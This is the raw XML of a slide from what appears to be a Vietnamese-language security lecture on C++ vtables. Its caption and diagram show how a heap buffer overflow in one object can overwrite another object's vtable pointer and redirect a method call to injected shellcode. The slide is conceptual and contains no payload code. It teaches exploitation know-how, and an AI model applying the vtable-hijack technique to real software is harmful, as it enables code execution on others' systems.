              <a:t> trong bảng vtable tới vùng nhớ chứa mã thực thi của phương thức</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="200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21547071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3365-D2DD-8CDB-579B-721A4A677C54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>C++ vtables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2744CDB4-D9E6-47D7-9801-D6422847C0EF}"/>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20" name="Google Shape;430;p50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4302B6D-BD0B-6B90-DFEB-F9EE4CE30FE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385375" y="4869531"/>
            <a:ext cx="8263900" cy="80018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r>
              <a:rPr kumimoji="0" lang="en" sz="2000" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Giả sử lỗi tràn bộ đệm xuất hiện cho phép làm tràn thuộc tính nào đó của </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>x,</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="2000" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="2000" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>giá trị con trỏ vtable của </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="2000" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="2000" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>có thể bị ghi đè</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="200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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="21" name="Google Shape;431;p50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F6D6B04-32BD-DDAD-2D94-AB05EEC90D90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="156976431"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="385375" y="1582187"/>
          <a:ext cx="2103150" cy="24380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1"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="274275">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>address of vtable of </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>y</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="1">
                        <a:solidFill>
                          <a:srgbClr val="FF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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="274275">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>address of </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>SHELLCODE</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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="274275">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>SHELLCODE</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="1">
                        <a:solidFill>
                          <a:srgbClr val="FF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4"/>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rgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>instance variable of </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>x</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="1">
                        <a:solidFill>
                          <a:srgbClr val="FF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5"/>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instance variable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vtable of </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>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7"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Google Shape;432;p50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8538DC3-067F-03B5-CE37-D6C3F79F5F0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385450" y="3966851"/>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kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Heap</a:t>
            </a:r>
            <a:endParaRPr kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="23" name="Google Shape;433;p50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A1A0719-D494-B3D1-D24B-2926B5C6C687}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3465750" y="3062962"/>
          <a:ext cx="2103150" cy="9142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bar</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foo</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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="Google Shape;434;p50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FC11647-1452-2777-B89A-BB6653CECB73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2476500" y="3839307"/>
            <a:ext cx="971700" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="25" name="Google Shape;435;p50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D22BC5DC-F8EF-8FE9-09B4-4D337526E03B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3465750" y="1582175"/>
          <a:ext cx="2103150" cy="91428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bar</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address of method </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>foo</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="1">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:latin typeface="Courier New"/>
                        <a:ea typeface="Courier New"/>
                        <a:cs typeface="Courier New"/>
                        <a:sym typeface="Courier New"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45700" marR="45700" marT="45700" marB="457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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="27" name="Google Shape;437;p50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3B7E900-BEB8-19A5-3185-B3D84AACAF4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6546125" y="1295400"/>
          <a:ext cx="2103150" cy="3047600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2103150">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>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bar</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> of </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>ClassY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foo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> of </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>ClassY</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3"/>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4"/>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5"/>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bar</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> of </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>ClassX</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6"/>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7"/>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a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>method </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>foo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> of </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>ClassX</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8"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="274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a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>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9"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28" name="Google Shape;438;p50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC4396E4-65DB-F251-C6B6-F36D1AD83789}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5568825" y="2262187"/>
            <a:ext cx="971700" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="29" name="Google Shape;439;p50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AF7CB60-3FA8-D463-EF7A-D426691A2E19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5568825" y="3814047"/>
            <a:ext cx="971700" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Google Shape;440;p50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F08532F4-01C3-217E-5D6B-F947BD6AFC3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6546275" y="4297376"/>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kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Code</a:t>
            </a:r>
            <a:endParaRPr kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Google Shape;441;p50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1710287-66C7-369B-FE60-7BEBB5E43B6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3465827" y="3962012"/>
            <a:ext cx="2103000" cy="461635"/>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b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ClassX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> vtable</a:t>
            </a:r>
            <a:endParaRPr b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Google Shape;442;p50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0993758C-B612-60B7-B1A4-5293D4488131}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3465827" y="2392550"/>
            <a:ext cx="2103000" cy="492412"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="114300" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ClassY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> vtable</a:t>
            </a:r>
            <a:endParaRPr sz="2000" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="33" name="Google Shape;443;p50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{314E6836-5E56-9697-6568-4E805461B91B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="5574525" y="1711212"/>
            <a:ext cx="971700" cy="273000"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34" name="Google Shape;444;p50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45F82644-7979-D842-D891-A5399D94D104}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="5574525" y="3302497"/>
            <a:ext cx="971700" cy="273000"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Google Shape;518;p54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FCCD58E-33EC-BEAB-00D8-9BB090DE7CE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="136650" y="2348902"/>
            <a:ext cx="253750" cy="318098"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10150" h="23424" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="10150" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="23424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9369" y="23424"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
